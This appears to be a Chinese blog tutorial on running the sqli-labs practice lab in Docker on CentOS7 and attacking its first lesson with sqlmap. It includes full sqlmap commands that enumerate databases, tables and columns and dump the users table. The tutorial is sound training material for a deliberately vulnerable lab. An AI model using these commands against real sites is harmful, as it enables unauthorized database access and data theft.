在CentOS7中搭建sqli-labs环境以及使用sqlmap对其进行sql注入

最新推荐文章于 2025-01-05 01:07:55 发布
原创 最新推荐文章于 2025-01-05 01:07:55 发布 · 7.4k 阅读 · 33 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#经验分享 #docker #centos #安全

本文介绍了如何在CentOS7上安装Docker并拉取sqli-labs镜像,详细阐述了启动和管理容器的步骤。接着,讲解了sqlmap的常用参数及其在Kali Linux中进行SQL注入测试的实践,包括获取数据库信息、数据表和数据内容等操作。这是一个针对网络安全和SQL注入测试的实战指南。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

安装docker

使用docker拉取sqli-labs的镜像

对我们使用到的sqlmap的参数解释

使用Kali中自带的sqlmap进行sql注入

安装docker

  1. 因为我们是使用docker去搭建sqli-labs,所以在CentOS7中搭建sqli-labs环境之前需要先安装docker(如果安装过,可以直接去执行安装完docker的后续步骤)
  2. 安装需要的软件包, yum-util 提供yum-config-manager实用程序,另外两个是devicemapper驱动依赖的,需要执行命令:yum install -y yum-utils device-mapper-persistent-data lvm2
  3. 通过yum-config-manager实用程序设置存储库,需要执行命令:yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
  4. 可以查看仓库中所有docker版本,需要执行命令:yum list docker-ce --showduplicates | sort -r
  5. 安装docker,执行命令:yum install docker-ce(中途遇到的选择都选Y)
  6. 如果安装失败,有可能是以前安装过,可以先卸载旧版本,在安装,卸载旧版本执行命令:yum remove docker docker-common docker-selinux docker-engine
  7. 启动docker,使用命令:systemctl start docker
  8. 验证是否安装成功(有client和service两部分表示docker安装启动都成功了),使用命令:docker version

使用docker拉取sqli-labs的镜像

  1. 在启动完docker后,使用docker拉取sqli-labs的镜像,执行命令:docker pull acgpiano/sqli-labs
  2. 使用docker images命令可以查看拉取到本地的镜像
  3. 用镜像运行创建一个容器,执行命令:docker run -d -P  acgpiano/sqli-labs
  4. 查看创建的容器的id和映射的端口,执行命令:docker ps -a
  5. 如果我们想要停止并删除创建的容器,可以执行以下命令
    1. 停止容器运行:docker stop 上图中的容器的ID
    2. 删除容器:docker rm 上图中的容器的ID
  6. 如果我们在停止容器后想要让这个容器再次运行的话,需要执行命令:docker start 容器的ID
  7. 确保我们的容器运行后,使用ip+上面的端口49154去访问,访问后需要先点击Setup/reset Database for labs选项,点击后会跳转到一个页面中,我们不需要管,直接返回当前这个页面中就可以使用了

对我们使用到的sqlmap的参数解释

  1. -u:指定目标URL,sql注入点
  2. --cookie:当前会话的cookie值(这个cookie的选项是在需要登录的测试环境中使用的选项,我们当前这个环境不需要登录,所以不需要使用cookie选项)
  3. --dbs:列举出所有的数据库
  4. --current-db:获取当前使用的数据库
  5. --current-user:获取当前登录数据库使用的用户
  6. -D:要枚举的数据库,也就是要指定我们操作的是哪个数据库
  7. --tables:枚举数据库中的所有数据表,也就是获取到数据库中的所有表的名字
  8. -T:要枚举的数据库表,也就是要指定我们操作的是哪个数据表
  9. --columns:枚举数据库表中的所有列,也就是获取到数据表中所有的列名(字段名)
  10. -C:要枚举的数据表中的列,也就是要指定我们操作的是数据表中的哪一列
  11. --dump:转储数据表项,也就是获取到数据表中的内容,配合-C参数就是获取一列的内容,配和-T参数就是获取整个表中的所有内容

使用Kali中自带的sqlmap进行sql注入

  1. 注意:在使用sqlmap进行sql注入的时候,最好去了解一下MySQL数据库,不然有可能会看不懂下面的一些文字描述
  2. 点击完Setup/reset Database for labs选项后,在点击SQLi-LABS Page-1..选项
  3. 然后,在跳转的页面中点击第一个去做sqlmap的测试
  4. 在选择第一个后,在url中输入?id=1测试出注入点,在测试出注入点后,需要将整个url保存下来,因为sqlmap的-u参数要用到,包括?id=1
  5. 然后在kali中使用sqlmap进行注入,使用命令获取所有的数据库:sqlmap -u http://192.168.28.148:49156/Less-1/?id=1 --dbs

  6. 使用命令获取到当前正在使用的数据库:sqlmap -u http://192.168.28.148:49156/Less-1/?id=1 --current-db

  7. 使用命令获取到这个security数据库下面的所有的数据表:sqlmap -u http://192.168.28.148:49156/Less-1?id=1 -D security --tables


  8. 使用命令获取到users表中的所有字段:sqlmap -u http://192.168.28.148:49156/Less-1/?id=1 -D security -T users --columns

  9. 使用命令获取到users表中username字段的内容:sqlmap -u http://192.168.28.148:49156/Less-1/?id=1 -D security -T users -C username --dump

  10. 如果想要获取到users表中所有的数据,执行命令:sqlmap -u http://192.168.28.148:49156/Less-1/?id=1 -D security -T users --dump

sql注入 sql-lib第一个(回显注入
weixin_74182283的博客
03-28 1632
SQL注入攻击的根源:程序命令和用户数据(即用户输入) 之间没有做到泾渭分明 注入成功的基础 1、相信用户输入的数据 2、Sql语句的拼接按照注入的网页功能类型分类 •(ps:注入类型纯看个人收集情况)1、登录注入 • 2、cms注入 •按照注入点值的属性分类 • 1、数值型 • 2、字符串型 •基于从服务器返回的内容 • 1、有回显 • 2、无回显 •按照注入的程度和顺序 • 1、一阶注入 • 2、二阶注入 •。
centos-7搭建sqli-labs(mysql+apache+php)
weixin_45937436的博客
05-05 1979
CentOS中默认安装有MariaDB,这个是MySQL的分支,但为了需要,还是要在系统中安装MySQL,而且安装完成之后可以直接覆盖掉MariaDB。 1 下载并安装MySQL官方的 Yum Repository [root@localhost ~]# wget -i -c http://dev.mysql.com/get/mysql57-community-release-el7-10.n...
Python黑客攻防(七)运用sqlmapsqli-labs进行SQL注入
qq_43681532的博客
07-16 2712
前言: 本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一关进行SQL注入。后续九关的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续关卡的通关步骤。 sqlmap基础命令: sqlmap支持多种选项,-u 选项表示后面出现的是URL, --level 选项表示要执行的测试级别,–risk选项用于设置待执行测试的风险。风险表示攻击所用SQL代码的危险程度,风险等级越高,表示相关网站出现问题的可能性越高。 -level选项 0:仅输出Python反向追踪( Trac
渗透工具环境篇——Centos7环境下安装Sqli-labs
Litbai_zhang
11-22 4234
特别不走心的简介 sqli-labs是一个SQL注入测试的渗透环境 安装流程 在搭建之前我们需要有lamp的环境 安装Apache的服务器 yum install httpd 然后启动Apache service httpd start 查看Apache状态 service httpd status 设置httpd在运行级别为2、3、4、5的情况下都是on的状态(如果发现测试php时网...
sqlmap命令_Python黑客攻防(八)运用sqlmapsqli-labs进行SQL注入
weixin_39680208的博客
11-21 1249
前言:本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一关进行SQL注入sqli-labs靶场搭建->Python黑客攻防(六)sqli-labs环境搭建 ,后续九关的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续关卡的通关步骤,在进行SQL注入前,我们先对sqlmap基础命令进行简单了解。sqlmap基础命令:sqlmap支持多种选项,-u 选项...
SQL注入使用sqli-labs案例以及sqlmap自动化注入工具)
04-29 5103
SQL注入sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后发现数据库和我本机的数据库出现冲突了,只能使用 sc delete mysql 删掉我本机的mysql8服务,如果需要使用原来的mysql,管理员命令下输入 mysqld --install 删除之后成功启动 启动成功后,去下载sqli-labs: https://github.com/Audi-1/
centos7.6安装docker搭建sqli-labs靶场
weixin_50644728的博客
10-14 784
Docker & VMware 1.Docker :是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。(摘自百度百科) 2.与vmware的区别: VMware是在宿主机器操作系统的基础上创建的从操作系统。需要几个相互隔离的应用,就需要启动几个虚拟机,会消耗大量CPU和内存。 docker在宿主机的操作系统上创建docker引擎,直接在宿主机操作系统上调用硬件资源
在kali进行sql注入的详细教程 目标ip192.168.152.101(虚拟机centos7)
最新发布
02-21
好的,我现在需要帮用户解决在Kali Linux上对目标IP 192.168.152.101(虚拟机CentOS7)进行SQL注入的详细教程。首先,用户之前的问题是关于DVWA搭建时遇到Apache默认页面的问题,现在转向SQL注入,可能用户已经成功...
sqlmap安装及使用详解一
回家吃月饼学习交流地
01-05 1163
sqlmap安装及使用详解
sqlilabs通关()
Forrest_bear的博客
05-24 2710
就像以下代码一样:隔离空格。
利用SQLmap进行一次SQL注入
m0_73303597的博客
11-27 799
自用
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 2018
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
sqlmap进行SQL注入
weixin_45095113的博客
03-16 706
sqlmapSQL注入
CenOS6.5搭建sqli-labs-master靶场环境
weixin_42566218的博客
02-17 2238
目录 一、靶场搭建环境准备 二、搭建过程 0x1 配置本地软件仓库 0x2 安装sqli-labs支持服务 0x3 部署sqli-labs靶场 三、测试sqli-labs靶场环境 一、靶场搭建环境准备 sqli-labs-master是一套结合http+php+mysql环境sql注入练习平台,里面有丰 富的sql注入靶场环境 虚拟机软件: VMware® Workstation 16 Pro...
centos7 安装sqlmap及利用sqlmap 进行SQL注入详解
m0_60571990的博客
02-21 1552
centos7 安装sqlmap及利用sqlmap 进行SQL注入详解
最全sqlmap命令
gzy1616的博客
03-06 792
-search 搜索数据库名、表明、列名,需要与-D -T或-C 联用。--columns 在-D -T情况下输出表中所有列名。-C column 在-D -T情况下输出某列数据的值。--tables 在-D情况下输出库中所有表名。--file-dest 上传文件(指定目标机器路径)--file-write 上传文件(指定本地路径)
Centos6.5中搭建sqli-labs SQL注入环境
qq_33168924的博客
05-25 563
Centos6.5中搭建sqli-labs SQL注入环境 sqli-labs简介 Sqli-labs是一款学习SQL注入的开源平台,共有75种之多 的注入类型。搭建好后可以方便我们练习SQL注入。 下载 Github 的下载地址:https://github.com/Audi-1/sqli-labs 浏览器输入上面下载地址,进入页面点击DownloadZIP,如 下图2-1所示: 图2-1: 下载后解压大致看到这么些文件,如图2-2所示: 图2-2 搭建 将解压好的文件目录上传到cent
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

所愿ღ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值